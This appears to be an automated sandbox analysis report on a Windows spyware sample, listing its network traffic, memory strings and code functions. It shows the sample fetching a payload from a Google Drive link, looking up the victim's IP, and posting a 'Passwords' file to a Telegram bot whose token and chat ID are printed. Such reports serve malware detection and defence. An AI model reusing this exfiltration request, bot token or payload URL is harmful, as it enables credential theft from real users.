            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31957da5bf21Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036F62000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036F02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036F62000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036F02000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036F62000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036D63000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036F02000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3433775511.0000000039440000.00000004.00000020.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000003.2948789931.0000000006836000.00000004.00000020.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3412063078.00000000067AD000.00000004.00000020.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3433775511.0000000039440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/D9?
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3433775511.0000000039440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/D9o
            Source: 9Yn5tjyOgT.exe, 00000006.00000003.2948789931.0000000006836000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/I6
            Source: 9Yn5tjyOgT.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036F62000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036F02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036F02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065
            Source: 9Yn5tjyOgT.exe, 00000006.00000003.2895362637.00000000067F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3412063078.0000000006748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3412871884.00000000081C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DSjlwqeKQZa9GEZPUUl4uS5KIqgLbDi_
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3412063078.0000000006782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DSjlwqeKQZa9GEZPUUl4uS5KIqgLbDi_2
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3412063078.0000000006782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DSjlwqeKQZa9GEZPUUl4uS5KIqgLbDi_n
            Source: 9Yn5tjyOgT.exe, 00000006.00000003.2930366052.00000000067B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: 9Yn5tjyOgT.exe, 00000006.00000003.2930366052.00000000067B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/)-pr
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3412063078.00000000067AD000.00000004.00000020.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000003.2930366052.00000000067B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/6
            Source: 9Yn5tjyOgT.exe, 00000006.00000003.2930366052.00000000067B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/7
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3412063078.0000000006782000.00000004.00000020.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000003.2895362637.00000000067F3000.00000004.00000020.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3412063078.0000000006748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DSjlwqeKQZa9GEZPUUl4uS5KIqgLbDi_&export=download
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: 9Yn5tjyOgT.exe, 00000006.00000003.2895362637.00000000067F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: 9Yn5tjyOgT.exe, 00000006.00000003.2895362637.00000000067F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: 9Yn5tjyOgT.exe, 00000006.00000003.2895362637.00000000067F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: 9Yn5tjyOgT.exe, 00000006.00000003.2895362637.00000000067F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: 9Yn5tjyOgT.exe, 00000006.00000003.2895362637.00000000067F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: 9Yn5tjyOgT.exe, 00000006.00000003.2895362637.00000000067F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: 9Yn5tjyOgT.exe, 00000006.00000003.2895362637.00000000067F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: 9Yn5tjyOgT.exe, 00000006.00000003.2895362637.00000000067F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
            Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
            Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
            Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49984 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.6:49985 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49989 version: TLS 1.2
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040558F
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,6_2_004034A5
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 0_2_00404DCC0_2_00404DCC
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 0_2_00406AF20_2_00406AF2
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 0_2_738E1B5F0_2_738E1B5F
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_00404DCC6_2_00404DCC
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_00406AF26_2_00406AF2
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_001543286_2_00154328
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_00158DA06_2_00158DA0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_001559686_2_00155968
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_00155F906_2_00155F90
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_00152DD16_2_00152DD1
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B87EC66_2_36B87EC6
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B8C6386_2_36B8C638
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B876286_2_36B87628
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B8572D6_2_36B8572D
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B8CCA06_2_36B8CCA0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B803AF6_2_36B803AF
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B8331A6_2_36B8331A
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B86EA06_2_36B86EA0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B86E916_2_36B86E91
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B87EF66_2_36B87EF6
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B8DEE16_2_36B8DEE1
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B8E7906_2_36B8E790
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B8CCA26_2_36B8CCA2
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B8B4EC6_2_36B8B4EC
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B8BD886_2_36B8BD88
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B8DA896_2_36B8DA89
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B8EBF26_2_36B8EBF2
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B8E3476_2_36B8E347
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B8B07F6_2_36B8B07F
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B878486_2_36B87848
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B8F0426_2_36B8F042
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B8C1F26_2_36B8C1F2
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B8B9306_2_36B8B930
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_3958A9B06_2_3958A9B0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395800406_2_39580040
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_3958A3606_2_3958A360
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_3958BA976_2_3958BA97
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_39589D106_2_39589D10
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_3958BDF06_2_3958BDF0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395886506_2_39588650
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395896C86_2_395896C8
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395821086_2_39582108
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_3958F1306_2_3958F130
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_3958F1206_2_3958F120
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395851F86_2_395851F8
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395829B86_2_395829B8
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395829A86_2_395829A8
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_3958A9A06_2_3958A9A0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395818586_2_39581858
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395818486_2_39581848
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395870706_2_39587070
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395870616_2_39587061
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395848106_2_39584810
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395848206_2_39584820
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395820F86_2_395820F8
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395863586_2_39586358
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_3958A3526_2_3958A352
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_39587B4F6_2_39587B4F
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395863686_2_39586368
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_39583B186_2_39583B18
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_39583B086_2_39583B08
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395843C86_2_395843C8
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395813F06_2_395813F0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395843B96_2_395843B9
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395832586_2_39583258
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395832686_2_39583268
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395852086_2_39585208
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_39585AB86_2_39585AB8
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_39585AA86_2_39585AA8
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_3958255F6_2_3958255F
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395825606_2_39582560
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_39589D006_2_39589D00
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_39584DB06_2_39584DB0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_39584DA06_2_39584DA0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_39586C186_2_39586C18
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_39586C096_2_39586C09
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395814006_2_39581400
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395874C86_2_395874C8
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395874B86_2_395874B8
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_39581CB06_2_39581CB0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_39581CA06_2_39581CA0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_39583F706_2_39583F70
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_39583F606_2_39583F60
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_39585F106_2_39585F10
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_39585F016_2_39585F01
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395867C06_2_395867C0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_3958AFF86_2_3958AFF8
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_3958AFF76_2_3958AFF7
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395867B06_2_395867B0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_39580FA86_2_39580FA8
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395856506_2_39585650
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395886406_2_39588640
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395856606_2_39585660
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_39582E106_2_39582E10
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395836C06_2_395836C0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395896B86_2_395896B8
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_395836B06_2_395836B0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_399DE7C86_2_399DE7C8
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_399DD6086_2_399DD608
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_399D6FA06_2_399D6FA0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_399D83286_2_399D8328
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: String function: 00402C41 appears 51 times
            Source: 9Yn5tjyOgT.exe, 00000000.00000000.2141245666.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 9Yn5tjyOgT.exe
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3412063078.0000000006782000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 9Yn5tjyOgT.exe
            Source: 9Yn5tjyOgT.exe, 00000006.00000000.2769996134.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 9Yn5tjyOgT.exe
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3431979224.0000000036A37000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 9Yn5tjyOgT.exe
            Source: 9Yn5tjyOgT.exeBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 9Yn5tjyOgT.exe
            Source: 9Yn5tjyOgT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@6/5
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,6_2_004034A5
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 0_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404850
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeFile created: C:\Users\user\AppData\Local\IwJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeMutant created: NULL
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeFile created: C:\Users\user\AppData\Local\Temp\nsr3981.tmpJump to behavior
            Source: 9Yn5tjyOgT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036DE5000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036E08000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036DF3000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3433593905.0000000037D1D000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036DD5000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036E14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
